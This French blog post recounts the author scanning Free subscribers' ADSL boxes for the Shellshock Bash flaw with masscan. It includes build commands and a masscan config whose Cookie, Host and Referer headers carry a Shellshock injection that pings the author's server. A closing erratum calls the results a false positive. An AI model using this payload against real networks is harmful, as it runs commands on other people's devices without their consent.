Geeek - Le blog Geek & High-tech

Après être tombé sur un article intéressant sur l'exploitation à distance de la faille de sécurité "shellshock" trouvée récemment sur Bash par un Français. Je me suis amusé à tester les Freebox et autres boîtiers ADSL connectés à mon DSLAM, le résultat de mon test est assez --intéressant-- inquiétant.
J'ai suivi l'astuce de Robert Graham sur l'utilisation de l'utilitaire masscan pour détecter les machines connectées à Internet vulnérables à la faille de sécurité "Shellshock.

J'ai donc compilé l'application masscan sur mon serveur avec le patch de Robert Graham permettant de modifier des entêtes HTTP.


$ sudo apt-get install git gcc make libpcap-dev
$ git clone https://github.com/robertdavidgraham/masscan
$ cd masscan/src/
$ rm proto-http.c
$ wget https://raw.githubusercontent.com/robertdavidgraham/masscan/master/src/proto-http.c
$ cd ..
$ make

J'ai repris le fichier de configuration de Robert Graham et je l'ai adapté la plage d'IP aux clients de Free connectés à mon DSLAM, l'histoire d'avoir une idée de la sensibilité des box de Free à cette nouvelle faille de sécurité qui secoue actuellement Internet.


target-ip = x.x.x.x/24 
port = 80
banners = true
http-user-agent = shellshock-scan (https://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 62.210.208.20
http-header[Host] = () { :; }; ping -c 3 62.210.208.20
http-header[Referer] = () { :; }; ping -c 3 62.210.208.20

Cette configuration de masscan injecte une commande shell dans les entêtes HTTP Cookie, Host et Referer. Si le serveur distant est vulnérable à la faille de sécurité "Shellshock" et que l'une des variables Cookie, Host et Referer est utilisée comme variable d'environnement lors de l'appel à un module CGI, un ping devrait automatiquement arriver sur mon serveur.

Je lance donc deux terminaux sur ma machine. Sur le premier terminal je lance un ''tcpdump'' pour afficher toutes les requêtes Ping entrantes et me permettre d'identifier toutes les machines vulnérables.

sudo tcpdump -v icmp

Sur le second terminal, je lance le masscan :

sudo ./masscan -c masscan.conf

Le résultat est assez surprenant, sur la plage d'IP de ma freebox chez Free, je découvre 15 Freebox Révolution allumées acceptant des requêtes sur le port 80. Mais heureusement, aucune d'entre elles ne me ping ... (c'est rassurant).

Cependant, ma machine reçoit 4 pings provenant de 4 box qui semblent être vulnérables à la faille "Shellshock" via l'injection de commandes shell par entêtes HTTP.

Les 4 box détectées ne répondent pas au ping et leurs ports semblent être filtrés (incorrectement si mes requêtes m'ont permis d'exécuter une commande shell sur ces box).

Je n'ai malheureusement pour le moment, aucune idée de quelle box il s'agit. Nmap ne m'a fourni aucune information exploitable ... D'après mes tests, les commandes shell transmises semblent être correctement interprétées par les box distantes, ce qui signifie qu'un cracker pourrait s'introduire sur votre réseau local ou avoir accès à l'ensemble des pages Web sur lesquels vous allez.

S'agit-il de la Freebox V5 ou de la Freebox Crystal ? Ou bien d'un NAS Synology connecté sur le port 80 de la Freebox ?


''Update 01/10/2014 : Erratum, la transmission des ping par les machines cibles semble être un comportement naturel et n'est pas lié à une faille de sécurité. Les machines transmettent une requête ping dès qu'elle reçoivent une requête HTTP .... Étrange !''


Vous êtes correctement abonné à Geeek
Bienvenue ! Vous êtes correctement connecté.
Parfait ! Vous êtes correctement inscrit.
Votre lien a expiré
Vérifiez vos emails et utiliser le lien magique pour vous connecter à ce site